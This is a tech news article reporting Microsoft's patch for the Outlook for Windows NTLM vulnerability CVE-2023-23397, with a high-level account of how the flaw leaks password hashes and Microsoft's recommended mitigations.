Microsoft Releases Updates to Patch Critical Outlook NTLM Vulnerability

Windows Logo

Microsoft has released patches to address a critical security flaw in Outlook for Windows. The company confirmed that a Russian hacking group exploited the NTLM vulnerability to target several European and military organizations in 2022.

The zero-day flaw (CVE-2023-23397) was first reported discovered by Ukraine’s Computer Emergency Response Team (CERT-UA). It’s a privilege escalation vulnerability with a 9.8 CVSS score affecting all supported versions of Outlook for Windows.

Essentially, the vulnerability lets remote attackers send a specially crafted email to a vulnerable system to access the victim’s NTLM password hash. Windows New technology LAN Manager (NTLM) is a suite of security protocols that use hashed login credentials for authentication in Windows domains. Once stolen, the NTLM password hash can be used for authentication purposes.

“CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server,” Microsoft explained. “The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication.”

It is important to note that the Outlook Web app doesn’t use NTLM to authenticate users. Microsoft has confirmed that the NTLM vulnerability only impacts customers running Outlook for Windows clients.

Microsoft details mitigation strategies to block Outlook NTLM attacks

Microsoft recommends its customers to install the latest security updates available for Outlook for Windows to address the NTLM vulnerability. Additionally, IT admins can block TCP 445/SMB outbound from their networks.

Microsoft also advises administrators to add on-premises accounts to the Protected Users Security Group. The company has also developed a PowerShell script to find and remove suspicious items in on-premises and cloud environments.